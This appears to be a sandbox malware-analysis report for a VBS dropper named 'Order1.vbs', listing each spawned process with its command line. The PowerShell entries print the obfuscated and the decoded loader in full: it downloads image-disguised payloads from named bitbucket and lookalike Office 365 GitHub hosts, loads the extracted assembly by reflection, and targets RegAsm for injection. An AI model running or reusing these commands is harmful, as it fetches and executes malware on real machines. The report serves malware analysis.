                                                                                                                                      Target ID:0
                                                                                                                                      Start time:13:03:21
                                                                                                                                      Start date:11/02/2025
                                                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order1.vbs"
                                                                                                                                      Imagebase:0x7ff77f300000
                                                                                                                                      File size:170'496 bytes
                                                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:13:03:22
                                                                                                                                      Start date:11/02/2025
                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@d@B4@HQ@LgBk@GU@RgBn@Ek@ZQBp@C8@bgBp@GE@bQ@v@HM@Z@Bh@GU@a@@v@HM@ZgBl@HI@LwB3@GU@bgBh@HI@YQBr@C8@Mw@x@DI@ZQBp@Gg@YwBp@HI@LwBt@G8@Yw@u@HQ@bgBl@HQ@bgBv@GM@cgBl@HM@dQBi@HU@a@B0@Gk@Zw@u@Hc@YQBy@C8@Lw@6@HM@Jw@s@C@@Jw@w@Cc@L@@g@Cc@UwB0@GE@cgB0@HU@c@BO@GE@bQBl@Cc@L@@g@Cc@UgBl@Gc@QQBz@G0@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                      File size:452'608 bytes
                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:13:03:22
                                                                                                                                      Start date:11/02/2025
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:13:03:23
                                                                                                                                      Start date:11/02/2025
                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.deFgIei/niam/sdaeh/sfer/wenarak/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                      File size:452'608 bytes
                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:7
                                                                                                                                      Start time:13:03:39
                                                                                                                                      Start date:11/02/2025
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                      Imagebase:0xb90000
                                                                                                                                      File size:65'440 bytes
                                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2615795647.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Disassembly

                                                                                                                                      Reset < >